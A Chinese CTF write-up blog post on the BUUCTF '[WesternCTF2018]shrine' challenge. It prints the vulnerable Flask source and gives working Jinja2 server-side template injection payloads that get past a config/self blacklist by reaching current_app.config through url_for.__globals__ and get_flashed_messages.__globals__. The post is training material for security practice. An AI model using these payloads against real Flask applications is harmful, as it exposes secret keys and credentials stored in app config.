第五十三题——[WesternCTF2018]shrine

最新推荐文章于 2024-01-13 17:29:52 发布
最新推荐文章于 2024-01-13 17:29:52 发布
阅读量259 收藏 1
点赞数
分类专栏: CTF-WEB 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37589805/article/details/116267100
版权

题目地址:https://buuoj.cn/challenges

解题思路

第一步:进入题目,看到源码

import flask 
import os 
app = flask.Flask(__name__) 
app.config['FLAG'] = os.environ.pop('FLAG') 

@app.route('/') 
def index(): 
	return open(__file__).read() 
@app.route('/shrine/<path:shrine>')
def shrine(shrine): 
	def safe_jinja(s): 
		s = s.replace('(', '').replace(')', '') 
		blacklist = ['config', 'self'] 
		return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s 		
	return flask.render_template_string(safe_jinja(shrine)) 

if __name__ == '__main__': 
	app.run(debug=True)

第二步:代码审计

  1. 从app可以看到config有个flag,读取出来就可以了
  2. 在shrine路由中看到最后一句flask将模板里的值读取出来了,可以通过URL访问/shrine/{{config}}获取出config值
  3. safe_jinja函数会将url里面的的config以及self替换为空字符串

第三步:构建漏洞

  1. 可以利用自带函数url_for和get_flashed_messages来获取flag
  2. 使用url_for.__globals__获取全局变量,看到current_app,再通过current_app获取到flag,最终:/shrine/{{url_for.__globals__["current_app"].config['FLAG']}}
    在这里插入图片描述
    在这里插入图片描述
  3. 还可以利用get_flashed_messages获取到flag,最终:/shrine/{{get_flashed_messages.__globals__["current_app"].config['FLAG']}}
想学习安全的小白
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[WesternCTF2018]shrine
brainw的博客
04-28 472
[WesternCTF2018]shrine import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/...
shrine-webdav:提供用于Shrine的简单WebDAV存储
05-11
gem 'shrine-webdav' 用法 假设您具有报告模型,该模型应该能够将数据存储在远程WebDAV存储中。 class Report < ApplicationRecord end # == Schema Information # # Table name: reports # # id :uuid not ...
buuctf-[WesternCTF2018]shrine(小宇特详解)
小宇的web博客
02-26 1478
buuctf-[WesternCTF2018]shrine(小宇特详解) 1.先看目 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') //注册了一个名为FLAG的config @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:
NO.2-20 [WesternCTF2018]shrine
nigo134的博客
08-01 310
SSTI模板注入: 模板注入涉及的是服务端Web应用使用模板引擎渲染用户请求的过程 服务端把用户输入的内容渲染成模板就可能造成SSTI(Server-Side Template Injection) 1.模板引擎 模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,用于网站的模板引擎就会生成一个标准的HTML文档。一些模板引擎:Smarty,Mako,Jinja2,Jade,Velocity,Freemaker和Twig 模板引擎可
[Western CTF 2018]shrine
weixin_45751765的博客
02-16 1416
0x00 前言 ssti复习 贴一下源码 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:shrine>') def shrine(shrine): def s
shrine.cr:适用于Crystal应用程序的文件附件工具包。 受神殿Ruby启发
02-05
Shrine.cr是一个专门为Crystal编程语言设计的文件附件处理库,灵感来源于Ruby社区中的 Shrine 框架。这个库提供了一套全面的解决方案,用于在Crystal应用程序中上传、存储和管理文件,同时也支持多种ORM适配器,使得...
shrine-commerce
04-04
"shrine-commerce" 是一个基于 Flutter 和 Dart 技术构建的电子商务项目,旨在提供一个用于学习和实践 MDC-100 系列代码实验室的平台。在这个项目中,你可以深入理解如何用 Flutter 构建现代化的购物应用,同时熟悉 ...
shrine:使用Shrine项目的MDC的Android模板项目
05-13
SHRINE-Android学习项目MDC-101-MDC-104:适用于Android的材料组件(Java) 您可以使用Shrine作为模板,使用不同的提交以不同的级别启动新的应用程序。 由brucemakallan编辑
shrine, ruby 应用程序的文件附件工具包.zip
09-18
shrine, ruby 应用程序的文件附件工具包 神殿Shrine是 ruby 应用程序中文件附件的工具包。如果你不确定为什么要小心,那么鼓励你阅读的动机,创建神殿的Shrine 。资源文档:shrinerb.com源:github....
Shrine View-crx插件
04-07
"Shrine View-crx插件"是一款专为谷歌浏览器(Chrome)设计的扩展程序,它为用户带来了一种独特的新标签页体验。当用户打开一个新的浏览器标签时,不再是普通的空白页面,而会显示一个随机选取的日本Shinto神社的...
基于Material Design 2实现的Shrine-MaterialDesign2..zip
09-24
【标】基于Material Design 2实现的Shrine-MaterialDesign2项目详解 【描述】Material Design 2,也称为Material Design Lite,是Google推出的一种设计语言的升级版,旨在为应用和网站提供更加统一、现代且富有...
PyPI 官网下载 | shrine-0.0.18.tar.gz
01-16
**PyPI 官网下载 | Shrine 0.0.18 档案解析** PyPI(Python Package Index)是Python社区广泛使用的软件仓库,它为开发者提供了上传和分享自己开发的Python模块、库和工具的平台。在给定的资源中,我们下载的是名为...
shrine-rails-example:使用Shrine gem的示例应用程序
03-10
神社Rails演示 这是的Rails演示。 它允许用户创建相册和附加图像。 该演示显示了高级工作流程: 上载: 用户选择一个或多个文件 将文件异步异步直接上传到S3,并显示进度条 缓存的文件数据被写入隐藏字段 ...
Shrine:Google的材料组件(MDC)代码实验室
05-08
**Shrine: Google的材料组件(MDC)代码实验室** 谷歌的材料设计组件(Material Design Components,MDC)是Android开发中的一个强大工具,旨在帮助开发者实现与谷歌材料设计规范一致的用户界面。这个名为“Shrine...
渗透学习-CTF篇-web-BUUCTF
qq_43696276的博客
01-17 2121
随着学习的不断深入,为了防止自己忘记之前所学的内容,于是我决定再不断的向下学习的同时做一些ctf的来唤醒自己的记忆!!
BUUCTF-[WesternCTF2018]shrine
最新发布
tmyzxy1314的博客
01-13 414
shrine/{{url_for.__globals__}} 输出所有全局变量。不知到是哪一个就一个一个试,这里我知道是current_app。这道,只要学会了ssti,认真分析代码就可以轻松拿下。/shrine/{{2-2}} 判断是否有ssti漏洞。其实以及获取了flag了但是可以再深入一点。运用Flask函数url_for()访问目链接是一串python代码。这样不好看,查看源代码。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值